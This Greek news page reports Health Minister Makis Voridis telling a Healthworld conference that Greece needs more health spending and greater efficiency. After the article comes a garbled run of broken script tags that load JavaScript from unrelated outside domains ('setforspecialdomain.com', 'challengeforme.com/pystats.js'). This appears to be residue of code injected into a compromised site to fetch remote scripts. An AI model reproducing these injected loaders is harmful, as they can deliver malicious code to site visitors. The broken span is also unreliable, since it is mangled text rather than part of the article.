Βορίδης: ”Θέλουμε περισσότερα χρήματα για την Υγεία”! Τι είπε για φάρμακα, ”κουρέματα”

Αύξηση της δαπάνης για την υγεία απαιτείται για τη χώρα μας παραδέχτηκε ο υπουργός υγείας Μάκης Βορίδης μιλώντας στο 13ο συνέδριο healthworld του Ελληνοαμερικανικό εμπορικό επιμελητήριο.

Περισσότερα χρήματα για την υγεία απαιτούνται πλέον παραδέχτηκε ο υπουργός υγείας Μάκης Βορίδης από το βήμα του συνεδρίου.
Ωστόσο δε διευκρίνισε που θα πρέπει να κατευθυνθούν τα χρήματα καθώς αναρωτήθηκε αν υπάρχει μεγαλύτερη ανάγκη για τις κλινικές, τις νοσηλείες ή τα φάρμακα. “Είναι κάτι που πρέπει να το δούμε” επεσήμανε χαρακτηριστικά.
Ο Μάκης Βορίδης μίλησε όμως και για την αποδοτικότητα του συστήματος η οποία θα πρέπει να βελτιωθεί ώστε να έχουν καλύτερες υπηρεσίες οι ασθενείς.
“Ο ασθενής είναι το κέντρο του ενδιαφέροντος μας. Και στόχος όλων μας θα πρέπει να είναι η βελτίωση της αποδοτικότητας και εδώ όλοι πρέπει να είμαστε στην ίδια βάρκα να βελτιώσουμε την αποδοτικότητα”!

___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >

Leave a Reply

Your email address will not be published. Required fields are marked *

*